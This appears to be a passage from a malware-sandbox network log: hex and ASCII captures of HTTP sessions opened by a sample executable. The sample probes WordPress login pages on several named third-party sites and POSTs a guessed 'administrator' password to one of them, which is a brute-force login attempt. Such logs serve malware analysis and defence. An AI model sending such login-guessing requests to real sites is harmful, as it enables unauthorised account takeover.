                                                                                                                                                                                                    2023-11-26 05:59:58 UTC3111INData Raw: 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 69 66 72 61 6d 65 2d 74 72 61 6e 73 70 6f 72 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 66 69 6c 65 75 70 6c 6f 61 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 61 6c 69 64 61 74 65 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 61 73 70 6e 65 74 63 64 6e 2e 63 6f 6d 2f 61 6a 61 78 2f
                                                                                                                                                                                                    Data Ascii: <script src="/resources/themes/main/js/vendor/jquery.iframe-transport.js"></script> <script src="/resources/themes/main/js/vendor/jquery.fileupload.js"></script> ... Validate --> <script src="//ajax.aspnetcdn.com/ajax/
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    520192.168.2.453505172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC640INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC729INData Raw: 37 64 32 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d2f<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f
                                                                                                                                                                                                    Data Ascii: ount:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info fo
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a
                                                                                                                                                                                                    Data Ascii: led:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72
                                                                                                                                                                                                    Data Ascii: (p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f
                                                                                                                                                                                                    Data Ascii: f(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return functio
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74
                                                                                                                                                                                                    Data Ascii: !!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigat
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28
                                                                                                                                                                                                    Data Ascii: t",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c
                                                                                                                                                                                                    Data Ascii: i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC1369INData Raw: 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                    Data Ascii: urn i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    521192.168.2.45322418.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC207INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:58 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    522192.168.2.45360734.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC401OUTPOST /wp-login.php?wpe-login=true HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=835c51dde586b73faf4b137534ab1370
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 134
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC134OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 30 39 38 70 6f 69 30 39 38 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=administrator&pwd=098poi098&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftiswheels.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC517INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 36 33 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72 61 67
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 6636Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EnginePrag
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC6636INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    523192.168.2.45338966.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC331OUTGET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC227INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 62 66 65 38 38 65 34 39 35 30 30 37 64 30 2d 49 41 44 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:58 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSServer: cloudflareCF-RAY: 82bfe88e495007d0-IAD
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC89INData Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    524192.168.2.45559774.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC244OUTGET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
